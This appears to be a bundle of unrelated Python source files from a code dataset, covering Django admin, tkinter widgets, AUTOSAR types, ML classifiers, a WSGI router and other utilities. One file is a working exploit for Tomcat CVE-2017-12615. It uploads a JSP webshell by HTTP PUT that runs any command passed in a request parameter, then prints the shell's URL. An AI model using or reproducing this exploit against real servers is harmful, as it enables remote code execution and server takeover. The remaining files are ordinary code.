5051001 | <filename>ethfinex/__init__.py
name = "ethfniex"
| StarcoderdataPython |
6485117 | <reponame>judaicalink/judaicalink-labs
from django.contrib import admin
from django.contrib.admin import AdminSite
import django.db.models as django_models
from . import views
from . import models
# Register your models here.
class MyAdminSite(AdminSite):
    # Custom admin site for the JudaicaLink Labs backend views.
    site_header = 'JudaicaLink Labs Backend'

    def get_urls(self):
        """Prepend the custom backend views to the default admin urls."""
        from django.conf.urls import url
        # NOTE(review): django.conf.urls.url is deprecated and removed in
        # Django 4; confirm the project's Django version before upgrading.
        urls = super(MyAdminSite, self).get_urls()
        # Note that custom urls get pushed to the list (not appended)
        # This doesn't work with urls += ...
        urls = [
            url(r'^load_from_github/$', self.admin_view(views.load_from_github), name='load_from_github'),
            url(r'^load_elasticsearch/$', self.admin_view(views.load_elasticsearch), name='load_elasticsearch'),
            url(r'^load_fuseki/$', self.admin_view(views.load_fuseki), name='load_fuseki'),
            url(r'^backend/serverstatus/$', self.admin_view(views.serverstatus), name='serverstatus'),
        ] + urls
        return urls
admin_site = MyAdminSite(name='admin')
class ThreadTaskAdmin(admin.ModelAdmin):
    # Columns shown in the task list; the name links to the detail view.
    list_display = ['name', 'started', 'ended', 'is_done', 'status_ok', 'last_log']
    list_display_links = ['name']
    list_filter = ['is_done', 'name']
| StarcoderdataPython |
352085 | # -*- coding: utf-8 -*-
"""
tkfilebrowser - Alternative to filedialog for Tkinter
Copyright 2017 <NAME> <<EMAIL>>
based on code by <NAME> copyright 1998
<http://effbot.org/zone/tkinter-autoscrollbar.htm>
tkfilebrowser is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
tkfilebrowser is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Scrollbar that hides automatically when not needed
"""
from tkfilebrowser.constants import tk, ttk
class AutoScrollbar(ttk.Scrollbar):
    """A ttk scrollbar that removes itself from the grid when the whole
    content is visible and reappears when scrolling is needed.

    Only grid geometry management is supported; pack and place raise.
    """

    def set(self, lo, hi):
        fully_visible = float(lo) <= 0.0 and float(hi) >= 1.0
        if fully_visible:
            # Nothing to scroll: hide the bar but keep its grid options.
            self.grid_remove()
        else:
            self.grid()
        ttk.Scrollbar.set(self, lo, hi)

    def pack(self, **kw):
        raise tk.TclError("cannot use pack with this widget")

    def place(self, **kw):
        raise tk.TclError("cannot use place with this widget")
| StarcoderdataPython |
1781141 | <gh_stars>100-1000
import autosar
def setup():
    """Create an AUTOSAR 4.2.2 workspace with the standard type packages
    registered under their respective roles."""
    workspace = autosar.workspace(version="4.2.2")
    pkg = workspace.createPackage('ApplicationTypes', role='DataType')
    for sub_name, sub_role in (('DataConstrs', 'DataConstraint'),
                               ('CompuMethods', 'CompuMethod'),
                               ('Units', 'Unit')):
        pkg.createSubPackage(sub_name, role=sub_role)
    return workspace
ws = setup()
compuMethodPackage = ws.findRolePackage('CompuMethod')
# Linear scaling: physical value = raw * 1/64 km/h, stored as float.
speedCompuMethod = compuMethodPackage.createCompuMethodRational('VehicleSpeed_CompuMethod',
    scaling=1/64, offset=0, unit="Km_per_h", forceFloat=True)
dataConstraintPackage = ws.findRolePackage('DataConstraint')
# Valid raw range 0..65535 (16-bit unsigned).
speedDataConstraint = dataConstraintPackage.createInternalDataConstraint('VehicleSpeed_DataConstraint', 0, 65535)
dataTypePackage = ws.findRolePackage('DataType')
dataTypePackage.createApplicationPrimitiveDataType('VehicleSpeed_T',
    dataConstraint = speedDataConstraint.ref, compuMethod=speedCompuMethod.ref)
# Export only the ApplicationTypes package tree.
ws.saveXML('DataTypes.arxml', filters=['/ApplicationTypes'])
| StarcoderdataPython |
3362717 | <gh_stars>1-10
from pydantic import create_model, validator
def create_model_for_table(tablename, cols):
    """Build a pydantic model named *tablename*.

    *cols* maps a column name to a ``(type_name, max_length)`` pair, where
    type_name is "int" or "str". Every field gets a validator that rejects
    values whose string form is longer than the declared column length.
    """
    lengths = {col: spec[1] for col, spec in cols.items()}

    def validate_length(cls, v, values, **kwargs):
        # Compare against the length limit declared for this field.
        assert lengths[kwargs["field"].name] >= len(f"{v}")
        return v

    type_map = {"int": int, "str": str}
    fields = {col: (type_map[spec[0]], ...)
              for col, spec in cols.items() if spec[0] in type_map}
    validators = {
        f"{col}_validator": validator(col, allow_reuse=True)(validate_length)
        for col in cols
    }
    return create_model(tablename, **fields, __validators__=validators)
| StarcoderdataPython |
4917897 | from secml.testing import CUnitTest
from numpy import *
from secml.data.loader import CDLRandomBlobs
from secml.optim.constraints import \
CConstraintBox, CConstraintL1, CConstraintL2
from secml.ml.features.normalization import CNormalizerMinMax
from secml.ml.classifiers import CClassifierSVM, CClassifierDecisionTree
from secml.core.type_utils import is_list, is_float
from secml.figure import CFigure
from secml.utils import fm
# Folder where the evasion test figures are saved; created on import
# if it does not exist yet.
IMAGES_FOLDER = fm.join(fm.abspath(__file__), 'test_images')
if not fm.folder_exist(IMAGES_FOLDER):
    fm.make_folder(IMAGES_FOLDER)
class CAttackEvasionTestCases(CUnitTest):
"""Unittests interface for CAttackEvasion."""
images_folder = IMAGES_FOLDER
make_figures = False # Set as True to produce figures
def _load_blobs(self, n_feats, n_clusters, sparse=False, seed=None):
"""Load Random Blobs dataset.
- n_samples = 50
- center_box = (-0.5, 0.5)
- cluster_std = 0.5
Parameters
----------
n_feats : int
n_clusters : int
sparse : bool, optional (default False)
seed : int or None, optional (default None)
"""
loader = CDLRandomBlobs(
n_samples=50,
n_features=n_feats,
centers=n_clusters,
center_box=(-0.5, 0.5),
cluster_std=0.5,
random_state=seed)
self.logger.info(
"Loading `random_blobs` with seed: {:}".format(seed))
ds = loader.load()
if sparse is True:
ds = ds.tosparse()
return ds
@staticmethod
def _discretize_data(ds, eta):
"""Discretize data of input dataset based on eta.
Parameters
----------
ds : CDataset
eta : eta or scalar
"""
if is_list(eta):
if len(eta) != ds.n_features:
raise ValueError('len(eta) != n_features')
for i in range(len(eta)):
ds.X[:, i] = (ds.X[:, i] / eta[i]).round() * eta[i]
else: # eta is a single value
ds.X = (ds.X / eta).round() * eta
return ds
def _prepare_linear_svm(self, sparse, seed):
"""Preparare the data required for attacking a LINEAR SVM.
- load a blob 2D dataset
- create a SVM (C=1) and a minmax preprocessor
Parameters
----------
sparse : bool
seed : int or None
Returns
-------
ds : CDataset
clf : CClassifierSVM
"""
ds = self._load_blobs(
n_feats=2, # Number of dataset features
n_clusters=2, # Number of dataset clusters
sparse=sparse,
seed=seed
)
normalizer = CNormalizerMinMax(feature_range=(-1, 1))
clf = CClassifierSVM(C=1.0, preprocess=normalizer)
return ds, clf
def _prepare_nonlinear_svm(self, sparse, seed):
"""Preparare the data required for attacking a NONLINEAR SVM.
- load a blob 2D dataset
- create a SVM with RBF kernel (C=1, gamma=1) and a minmax preprocessor
Parameters
----------
sparse : bool
seed : int or None
Returns
-------
ds : CDataset
clf : CClassifierSVM
"""
ds = self._load_blobs(
n_feats=2, # Number of dataset features
n_clusters=2, # Number of dataset clusters
sparse=sparse,
seed=seed
)
normalizer = CNormalizerMinMax(feature_range=(-1, 1))
clf = CClassifierSVM(kernel='rbf', C=1, preprocess=normalizer)
return ds, clf
def _prepare_tree_nonlinear_svm(self, sparse, seed):
    """Build the data for attacking a TREE via a surrogate NONLINEAR SVM.

    Loads a 2D blob dataset, a decision-tree target classifier and an
    RBF-kernel SVM (C=1) used as the surrogate model.

    Parameters
    ----------
    sparse : bool
    seed : int or None

    Returns
    -------
    ds : CDataset
    clf : CClassifierDecisionTree
    clf_surr : CClassifierSVM
    """
    blobs = self._load_blobs(
        n_feats=2,     # number of dataset features
        n_clusters=2,  # number of dataset clusters
        sparse=sparse,
        seed=seed)
    tree = CClassifierDecisionTree(random_state=seed)
    surrogate = CClassifierSVM(kernel='rbf', C=1)
    return blobs, tree, surrogate
@staticmethod
def _choose_x0_2c(ds):
    """Pick a starting point labeled 1 from a 2-class dataset.

    Parameters
    ----------
    ds : CDataset
        2-class dataset.

    Returns
    -------
    x0 : CArray
        Initial attack point (the second sample with label 1).
    y0 : CArray
        Label of the initial attack point.
    """
    if ds.num_classes != 2:
        raise ValueError("Only 2-class datasets can be used!")
    # Take the second (index 1) sample among those labeled malicious.
    malicious = ds.Y.find(ds.Y == 1)
    x0 = ds.X[malicious[1], :].ravel()
    return x0, +1
def _run_evasion(self, evas, x0, y0, expected_x=None, expected_y=None):
    """Run evasion on input x and sanity-check its outputs.

    Parameters
    ----------
    evas : CAttackEvasion
    x0 : CArray
        Initial attack point.
    y0 : CArray
        Label of the initial attack point.
    expected_x : CArray or None, optional
        Expected final optimal point.
    expected_y : int or CArray or None, optional
        Label of the expected final optimal point.
    """
    self.logger.info("Malicious sample: " + str(x0))
    self.logger.info("Is sparse?: " + str(x0.issparse))
    # Time only the attack itself; the log lines below read optimizer
    # state stored on the evasion object after `run` completes.
    with self.logger.timer():
        y_pred, scores, adv_ds, f_obj = evas.run(x0, y0)
    self.logger.info("Starting score: " + str(
        evas.classifier.decision_function(x0, y=1).item()))
    self.logger.info("Final score: " + str(evas.f_opt))
    self.logger.info("x*:\n" + str(evas.x_opt))
    self.logger.info("Point sequence:\n" + str(evas.x_seq))
    self.logger.info("Score sequence:\n" + str(evas.f_seq))
    self.logger.info("Fun Eval: " + str(evas.f_eval))
    self.logger.info("Grad Eval: " + str(evas.grad_eval))
    # Checking output: a single input point must yield a single
    # prediction/score/adversarial sample, preserving sparsity.
    self.assertEqual(1, y_pred.size)
    self.assertEqual(1, scores.shape[0])
    self.assertEqual(1, adv_ds.num_samples)
    self.assertEqual(adv_ds.issparse, x0.issparse)
    self.assertTrue(is_float(f_obj))
    # Compare optimal point with expected (4-decimal tolerance)
    if expected_x is not None:
        self.assert_array_almost_equal(
            evas.x_opt.todense().ravel(), expected_x, decimal=4)
    if expected_y is not None:
        self.assert_array_almost_equal(y_pred.item(), expected_y)
@staticmethod
def _constr(evas, c):
    """Return the distance constraint matching the attack's distance.

    Parameters
    ----------
    evas : CAttackEvasion
    c : CArray
        Center of the constraint.

    Returns
    -------
    CConstraintL1 or CConstraintL2
    """
    # TODO: there is no way to cleanly extract it from evasion object
    # BUG FIX: the original used `is "l1"`, which tests object identity;
    # equal strings are not guaranteed to be the same object (interning
    # is a CPython implementation detail), so compare with `==`.
    if evas.distance == "l1":
        return CConstraintL1(center=c, radius=evas.dmax)
    return CConstraintL2(center=c, radius=evas.dmax)
@staticmethod
def _box(evas):
    """Return the box constraint built from the attack's bounds.

    Parameters
    ----------
    evas : CAttackEvasion

    Returns
    -------
    CConstraintBox
    """
    # TODO: there is no way to cleanly extract it from evasion object
    lower, upper = evas.lb, evas.ub
    return CConstraintBox(lb=lower, ub=upper)
def _plot_2d_evasion(self, evas, ds, x0, filename, th=0, grid_limits=None):
    """Plot evasion attack results for 2D data.

    Parameters
    ----------
    evas : CAttackEvasion
    ds : CDataset
    x0 : CArray
        Initial attack point.
    filename : str
        Name of the output pdf file.
    th : scalar, optional
        Scores threshold of the classifier. Default 0. (Currently
        unused in the body.)
    grid_limits : list of tuple or None, optional
        If not specified, will be set as [(-1.5, 1.5), (-1.5, 1.5)].
    """
    if self.make_figures is False:
        self.logger.debug("Skipping figures...")
        return
    fig = CFigure(height=6, width=6)
    if grid_limits is None:
        grid_limits = [(-1.5, 1.5), (-1.5, 1.5)]
    fig.sp.plot_ds(ds)
    # Attack objective function drawn as the background surface.
    fig.sp.plot_fun(
        func=evas.objective_function,
        grid_limits=grid_limits, colorbar=False,
        n_grid_points=50, plot_levels=False)
    # Classifier decision boundary, without background fill.
    fig.sp.plot_decision_regions(
        clf=evas.classifier, plot_background=False,
        grid_limits=grid_limits,
        n_grid_points=50)
    # Feature-space box constraint (attack lb/ub bounds).
    fig.sp.plot_constraint(self._box(evas),
                           n_grid_points=20,
                           grid_limits=grid_limits)
    # Distance constraint centered on x0, drawn as its zero level set.
    fig.sp.plot_fun(func=lambda z: self._constr(evas, x0).constraint(z),
                    plot_background=False,
                    n_grid_points=50,
                    grid_limits=grid_limits,
                    levels=[0],
                    colorbar=False)
    # Sequence of points visited by the attack optimizer.
    fig.sp.plot_path(evas.x_seq)
    fig.savefig(fm.join(self.images_folder, filename), file_format='pdf')
| StarcoderdataPython |
172031 | <gh_stars>0
import sys
import pytest
from natural import N
from uintset import UintSet
def test_len():
    # N (the natural numbers) reports the largest len() a container may have.
    assert len(N) == sys.maxsize
def test_contains():
    # Membership in N: every non-negative integer is a member,
    # negatives are not; no upper bound below sys.maxsize.
    assert 0 in N
    assert 1 in N
    assert -1 not in N
    assert 42 in N
    assert sys.maxsize in N
# Union with N absorbs any UintSet, regardless of operand order.
union_cases = [
    (N, UintSet()),
    (N, UintSet([1])),
    (UintSet([1]), N),
    (UintSet([1, 100]), N),
]


@pytest.mark.parametrize("first, second", union_cases)
def test_or_op(first, second):
    got = first | second
    assert got == N
# Intersection with N is an identity: the finite operand is the result,
# regardless of operand order.
intersection_cases = [
    (N, UintSet(), UintSet()),
    (N, UintSet([1]), UintSet([1])),
    (UintSet([1]), N, UintSet([1])),
    (UintSet([1, 100]), N, UintSet([1, 100])),
]


@pytest.mark.parametrize("first, second, want", intersection_cases)
def test_and_op(first, second, want):
    got = first & second
    assert got == want
| StarcoderdataPython |
3533841 | #! /usr/bin/env python
"""
Produces classifications of MNIST so we have something to develop calibration
tools against. The classifications are saved as a pandas dataframe.
Usage:
$ ./gen_data.py --jobs 60 --output results.pkl
"""
import argparse
import multiprocessing
import time
import numpy as np
import pandas as pd
from sklearn.datasets import fetch_mldata
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression, SGDClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import LinearSVC
def get_mnist(predicate=None, shuffle=True):
    """Load MNIST, optionally transform labels, then split and shuffle.

    Args:
        predicate: optional callable applied to both label vectors
            (e.g. a mask that turns labels into booleans).
        shuffle: shuffle the training split (some models need this).

    Returns:
        A 4-tuple of (X_train, X_test, y_train, y_test)
    """
    mnist = fetch_mldata('MNIST original', data_home='.')
    X, y = mnist['data'], mnist['target']
    # MNIST ships as 60k training samples followed by 10k test samples.
    split = 60_000
    X_train, y_train = X[:split], y[:split]
    X_test, y_test = X[split:], y[split:]
    if predicate is not None:
        y_train, y_test = predicate(y_train), predicate(y_test)
    if shuffle:
        # Some models need shuffling
        order = np.random.permutation(split)
        X_train, y_train = X_train[order], y_train[order]
    return X_train, X_test, y_train, y_test
def predict_proba(clf, X_test):
    """Produce a probability-like score vector for clf on X_test.

    Classifiers exposing `predict_proba` contribute the probability of
    the positive class; otherwise the decision function is min-max
    scaled into [0, 1].

    Returns:
        1-D array of scores in [0, 1], one per row of X_test.
    """
    if hasattr(clf, "predict_proba"):
        return clf.predict_proba(X_test)[:, 1]
    # use decision function, min-max scaled into [0, 1]
    prob = clf.decision_function(X_test)
    span = prob.max() - prob.min()
    if span == 0:
        # BUG FIX: a constant decision function made the original
        # expression divide by zero (NaNs); report flat zeros instead.
        return np.zeros_like(prob, dtype=float)
    return (prob - prob.min()) / span
def evens(vec):
    """Return a boolean mask (ndarray) marking the even entries of `vec`."""
    remainder = vec % 2
    return remainder == 0
def classify(clf, X_train, y_train, X_test):
    """Fit `clf` on the training split and score the test split.

    Returns:
        (predictions, scores): hard predictions plus probability-like
        scores from the module-level `predict_proba` helper.
    """
    clf.fit(X_train, y_train)
    predictions = clf.predict(X_test)
    scores = predict_proba(clf, X_test)
    return predictions, scores
if __name__ == '__main__':
    # Fixed seed so the training-split shuffle is reproducible.
    np.random.seed(42)
    parser = argparse.ArgumentParser()
    parser.add_argument('-j', '--jobs', type=int)
    parser.add_argument('-o', '--output',
                        default='sample_classification_results.pkl')
    args = parser.parse_args()
    # 60 is the number of allowable cores on inferno - this prevents us
    # completely tieing up inferno's resources by accident
    n_jobs = args.jobs or min(multiprocessing.cpu_count(), 60)
    print(f'Using up to {n_jobs} cores')
    print(f'Results will be saved at {args.output}')
    print()
    # We create an even detector so that we have a binary classifier to work
    # with that has a decent number of true actuals vs the total
    X_train, X_test, y_train, y_test = get_mnist(predicate=evens)
    # note: this last one (KNeighborsClassifier) takes a while
    classifiers = (LogisticRegression(C=1., solver='lbfgs', n_jobs=n_jobs),
                   GaussianNB(),
                   LinearSVC(),
                   RandomForestClassifier(n_jobs=n_jobs),
                   SGDClassifier(tol=None, max_iter=5, n_jobs=n_jobs),
                   KNeighborsClassifier(n_jobs=n_jobs))
    headers = []
    results = []
    for clf in classifiers:
        msg = 'Starting classification via {:30}'
        # By default, sys.stdout buffers output until a newline is encountered,
        # but we're doing all the work in between now and when that happens so
        # we have to manually flush the output
        print(msg.format(clf.__class__.__name__ + '... '), end='', flush=True)
        start = time.time()
        pred, prob = classify(clf, X_train, y_train, X_test)
        elapsed = time.strftime("%H:%M:%S", time.gmtime(time.time() - start))
        print(f'Done [{elapsed}]')
        headers.append(clf.__class__.__name__)
        # Two result columns per classifier: predictions and scores.
        results.extend([pred, prob])
    print(f'Saving results to {args.output}... ', end='', flush=True)
    # Read the data into a dataframe and serialize it to disk.
    # Columns are a two-level (Classifier, Method) MultiIndex;
    # rows are test samples.
    rows = np.array(results).T
    columns = pd.MultiIndex.from_product(
        [headers, ['Prediction', 'Probability']],
        names=['Classifier', 'Method'],
    )
    df = pd.DataFrame(rows, columns=columns)
    df['actual'] = y_test
    df.to_pickle(args.output)
    print('Done')
| StarcoderdataPython |
274238 | import collections.abc
import inspect
import re
import typing
import wsgiref.simple_server
import webob
import webob.exc
from . import mappers
def generate_sitemap(sitemap: typing.Mapping, prefix: list=None):
    """Create a sitemap template from the given sitemap.

    The `sitemap` should be a mapping where the key is a string which
    represents a single URI segment, and the value is either another mapping
    or a callable (e.g. function) object.

    Args:
        sitemap: The definition of the routes and their views
        prefix: The base url segment which gets prepended to the given map.

    Yields:
        (segments, view) pairs: the list of URI segments leading to the
        callable `view`.

    Examples:
        The sitemap should follow the following format:

        >>> {
        >>>     'string_literal': {
        >>>         '': func1,
        >>>         '{arg}': func2,
        >>>     },
        >>> }

        The key points here are thus:
            - Any string key not matched by the following rule will be matched
              literally
            - Any string key surrounded by curly brackets matches a url segment
              which represents a parameter whose name is the enclosed string
              (i.e. should be a valid keyword argument)
            - *note* a side effect of this is that an empty string key will
              match all routes leading up to the current given mapping

        The above sitemap would compile to the following url mappings:
            - /string_literal/ -> calls `func1()`
            - /string_literal/{arg}/ -> calls `func2(arg=<the matched value>)`
    """
    # A mutable default would be shared across calls, hence None.
    if prefix is None:
        prefix = []
    for segment, sub_segment in sitemap.items():
        if isinstance(sub_segment, collections.abc.Mapping):
            # Nested mapping: recurse with this segment appended.
            yield from generate_sitemap(sub_segment, prefix + [segment])
        elif isinstance(sub_segment, collections.abc.Callable):
            # BUG FIX: build the yielded path in a fresh local instead of
            # rebinding `prefix`; the rebinding leaked one view's segment
            # into the routes of later siblings in the same mapping.
            route = prefix + [segment] if segment else prefix
            yield (route, sub_segment)
        else:
            raise ValueError('Invalid datatype for sitemap')
def compile_route_regex(template):
    """Compile a route template (list of URI segments) into an anchored regex.

    `{name}` segments become named capture groups matching one `\\w+`
    value; every other segment is matched literally.

    Returns:
        The regex pattern string (use with `re.match`).
    """
    path = '/'.join(template)
    # FIX: raw string literals — '\w' in a plain string is an invalid
    # escape sequence (DeprecationWarning, an error in future Pythons).
    placeholder_re = r'\{(\w+)\}'
    parts = ['^']
    last_end = 0
    for match in re.finditer(placeholder_re, path):
        # Literal text before the placeholder is escaped verbatim.
        parts.append(re.escape(path[last_end:match.start()]))
        parts.append(r'(?P<{}>\w+)'.format(match.group(1)))
        last_end = match.end()
    parts.append(re.escape(path[last_end:]))
    parts.append('$')
    return ''.join(parts)
def get_parameter_mappings(callable):
    """Map each parameter name of `callable` to its annotation.

    Unannotated parameters map to `inspect.Parameter.empty`.
    """
    signature = inspect.signature(callable)
    return {name: parameter.annotation
            for name, parameter in signature.parameters.items()}
def map_params(mappings, context):
    """Convert each value in `context` via its converter in `mappings`.

    Values whose mapping is `inspect.Signature.empty` (the parameter was
    unannotated) pass through unchanged.
    """
    converted = {}
    for name, raw in context.items():
        converter = mappings[name]
        converted[name] = (
            raw if converter == inspect.Signature.empty else converter(raw))
    return converted
def get_route_response(sitemap, route_template, request):
    """Walk `sitemap` along `route_template` and invoke the matched view.

    `{name}` segments pull their value from `request.urlvars` and are
    passed to the view as keyword arguments, converted according to the
    view's parameter annotations.
    """
    route_template = iter(route_template)
    next(route_template)  # skip the leading prefix segment
    url_context = {}
    sitemap_context = sitemap
    for segment in route_template:
        keyword = None
        if segment.startswith('{') and segment.endswith('}'):
            # Parameter segment: capture the matched URL value.
            keyword = segment[1:-1]
            url_context[keyword] = request.urlvars[keyword]
        resource_callable = None
        sitemap_context = sitemap_context[segment]
        if isinstance(sitemap_context, collections.abc.Callable):
            if segment:
                resource_callable = sitemap_context
        elif '' in sitemap_context:
            # An empty-string key maps the enclosing path itself.
            resource_callable = sitemap_context['']
        if resource_callable:
            param_mappings = get_parameter_mappings(resource_callable)
            url_context = map_params(param_mappings, url_context)
            response = resource_callable(request, **url_context)
            if keyword:
                # NOTE(review): the view's response replaces the raw URL
                # value in the context — presumably so nested views can
                # consume the parent's result; confirm intent.
                url_context[keyword] = response
    # NOTE(review): `response` is unbound if no view was invoked along
    # the template — verify callers always pass a resolvable route.
    return response
def get_callable_return_type(callable):
    """Return the annotated return type of `callable`, or None if absent."""
    annotation = inspect.signature(callable).return_annotation
    return None if annotation == inspect.Signature.empty else annotation
def inject_wsgi_types(request_type, response_type, base_exc_type):
    """Build a `make_route_response` factory bound to concrete WSGI types.

    The returned factory wraps a view callable into a WSGI application:
    requests are parsed with `request_type`, view return values are
    converted via a mapper type (the view's return annotation when
    present, else `mappers.Response`), and raised `base_exc_type`
    exceptions are used directly as the WSGI response.
    """
    def make_route_response(sitemap, route_template, callable, conversion_type=mappers.Response):
        def replacement(env, start_response):
            request = request_type(env)
            try:
                response = get_route_response(sitemap, route_template, request)
            except base_exc_type as e:
                # HTTP exceptions (e.g. 404) double as WSGI applications.
                response = e
            else:
                response = conversion.get(response)
            return response(env, start_response)
        # A view's return annotation, when given, overrides the default
        # conversion type; `conversion` is closed over by `replacement`.
        return_type = get_callable_return_type(callable)
        if return_type:
            conversion_type = return_type
        conversion = conversion_type(response_type)
        return replacement
    return make_route_response
class Tawdry():
    """Minimal WSGI application that dispatches requests via a sitemap."""

    # Class attributes so subclasses can swap WSGI implementations.
    request_type = webob.Request
    response_type = webob.Response
    base_exc_type = webob.exc.HTTPException

    def __init__(self, sitemap=None, prefix=''):
        """
        Args:
            sitemap: Mapping of URI segments to views; see
                `generate_sitemap` for the expected format.
            prefix: The base url segment which gets prepended to the given map.
                *note* the default of ''. This will cause the generated URI to be
                prefixed with '/'. If `None` is passed, there will be no prefix,
                but if any other string is passed, it should generally begin with
                a '/'.
        """
        if sitemap is None:
            sitemap = {}
        make_route_response = inject_wsgi_types(
            self.request_type,
            self.response_type,
            self.base_exc_type,
        )
        generated_sitemap = generate_sitemap(sitemap, [prefix])
        # Pre-compile every route into a (regex, WSGI controller) pair.
        self._routes = []
        for route_template, callable in generated_sitemap:
            compiled_route = compile_route_regex(route_template)
            controller = make_route_response(sitemap, route_template, callable)
            self._routes.append((compiled_route, controller))

    def __call__(self, env, start_response):
        # WSGI entry point: dispatch to the first route whose regex
        # matches the request path; 404 when none does.
        request = self.request_type(env)
        for regex, controller in self._routes:
            match = re.match(regex, request.path_info)
            if match:
                request.urlvars = match.groupdict()
                return controller(env, start_response)
        return webob.exc.HTTPNotFound()(env, start_response)

    def serve(self, make_server=wsgiref.simple_server.make_server, host='127.0.0.1', port=5000):
        # Blocking development server; Ctrl-C exits cleanly.
        httpd = make_server(host, port, self)
        print('Serving on http://{host}:{port}'.format(host=host, port=port))
        try:
            httpd.serve_forever()
        except KeyboardInterrupt:
            print('^C')
| StarcoderdataPython |
4873388 | # -*- coding: utf-8 -*-
import sys
import requests
import time
'''
Usage:
moon.py -u tomcat http://127.0.0.1:8080
shell: http://127.0.0.1:8080/201712615.jsp?pwd=<PASSWORD>&cmd=whoami
影响范围:Linux/Windows Tomcat: 7.0.0 to 7.0.79 - 官网数据
成因:Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件
最好的解决方式是将 conf/web.xml 中对于 DefaultServlet 的 readonly 设置为 true
'''
def attack(URL):
print('[+]开始检测-Tomcat-CVE-2017-12615。[+]')
url = URL + '/T68t8YT86.jsp/'
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
headers={"User-Agent":user_agent}
data="""<%
if("fff".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>"""
try:
requests.put(url, headers=headers, data=data)
time.sleep(2)
verify_response = requests.get(url[:-1], headers=headers)
if verify_response.status_code == 200:
print('存在-Tomcat-CVE-2017-12615!!!')
print('shell: ' + url[:-1]+'?pwd=fff&cmd=whoami')
else :
print('访问shell地址:'+verify_response.status_code)
print("未发现-Tomcat-CVE-2017-12615。")
except :
print("未发现-Tomcat-CVE-2017-12615。")
print('[+]检测结束-Tomcat-CVE-2017-12615。[+]')
print('\n')
if __name__ == "__main__":
attack() | StarcoderdataPython |
248995 | import json
import numpy as np
import pandas as pd
import pickle
from sklearn import ensemble
from sklearn import datasets
from sklearn.utils import shuffle
from sklearn.metrics import mean_squared_error
from mlserve import build_schema
boston = datasets.load_boston()
# Shuffle so the 90/10 train/test split below is random but reproducible.
X, y = shuffle(boston.data, boston.target, random_state=13)
X = X.astype(np.float32)
offset = int(X.shape[0] * 0.9)
X_train, y_train = X[:offset], y[:offset]
X_test, y_test = X[offset:], y[offset:]
# Gradient-boosted regression tree hyperparameters.
params = {
    'n_estimators': 500,
    'max_depth': 4,
    'min_samples_split': 2,
    'learning_rate': 0.01,
    'loss': 'ls',
}
clf = ensemble.GradientBoostingRegressor(**params)
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
mse = mean_squared_error(y_test, clf.predict(X_test))
print('MSE: %.4f' % mse)
# Rebuild the full dataset as a DataFrame (features + 'target' column)
# so mlserve can derive an input schema for the served model.
columns = list(boston.feature_names) + ['target']
data = np.c_[boston.data, boston.target]
df = pd.DataFrame(data=data, columns=columns)
model_file = 'boston_gbr.pkl'
print('Writing model')
with open(model_file, 'wb') as f:
    pickle.dump(clf, f)
print('Writing dataset schema')
schema = build_schema(df)
with open('boston_schema.json', 'w') as f:
    json.dump(schema, f, indent=4, sort_keys=True)
| StarcoderdataPython |
3530461 | #
# Create 2015 tazdata map from UrbanSim input layer(s) using building data and pipeline data
# Reads
# 1) UrbanSim basemap h5 (URBANSIM_BASEMAP_FILE), parcels and buildings
# 2) Development pipeline csv (URBANSIM_BASEMAP_FILE)
# 3) Employment taz data csv (EMPLOYMENT_FILE)
#
# Outputs
#
# Notes:
# - zone_id and county/county_id aren't always consistent with the TM mapping between zones/county
# (https://github.com/BayAreaMetro/travel-model-one/blob/master/utilities/geographies/taz-superdistrict-county.csv)
# This script assumes the zone_id is accurate and pull the county from the TM correspondence file
# TODO: report on these?
#
# for arcpy:
# set PATH=C:\Program Files\ArcGIS\Pro\bin\Python\envs\arcgispro-py3
import logging,os,re,sys,time
import numpy, pandas
# Timestamp used to tag output/log file names.
NOW = time.strftime("%Y%b%d.%H%M")

# taz-county file (travel model TAZ / superdistrict / county correspondence)
TAZ_COUNTY_FILE = "X:\\travel-model-one-master\\utilities\\geographies\\taz-superdistrict-county.csv"

# taz shapefile
TAZ_SHPFILE = "M:\\Data\\GIS layers\\TM1_taz\\bayarea_rtaz1454_rev1_WGS84.shp"

# reference for creation:
# Create and share 2015 tazdata from basemap plus development pipeline with MTC planners @
# https://app.asana.com/0/385259290425521/1165636787387665/f

if os.getenv("USERNAME")=="lzorn":
    # use local dir to make things faster
    URBANSIM_LOCAL_DIR = "C:\\Users\\lzorn\\Documents\\UrbanSim_InputMapping"
    # from https://mtcdrive.box.com/s/w0fmrz85l9cti2byd6rjqu9hv0m2edlq
    URBANSIM_BASEMAP_FILE = "2020_03_20_bayarea_v6.h5"
    # from https://mtcdrive.box.com/s/wcxlgwov5l6s6p0p0vh2xj1ekdynxxw5
    URBANSIM_PIPELINE_FILE= "pipeline_2020Mar20.1512.csv"
    URBANSIM_PIPELINE_GDB = "devproj_2020Mar20.1512.gdb"
    # employment data
    EMPLOYMENT_FILE = "X:\\petrale\\applications\\travel_model_lu_inputs\\2015\\TAZ1454 2015 Land Use.csv"
    OUTPUT_DIR = os.path.join(URBANSIM_LOCAL_DIR, "map_data")
    LOG_FILE = os.path.join(OUTPUT_DIR, "create_tazdata_devpipeline_map_{}.log".format(NOW))
    # building types
    BUILDING_TYPE_FILE = "X:\\petrale\\incoming\\dv_buildings_det_type_lu.csv"
    # with activity categories
    BUILDING_TYPE_ACTIVITY_FILE = "X:\\petrale\\TableauAliases.xlsx"
    # geodatabase for arcpy and map
    WORKSPACE_GDB = "C:\\Users\\lzorn\\Documents\\UrbanSim_InputMapping\\UrbanSim_InputMapping.gdb"
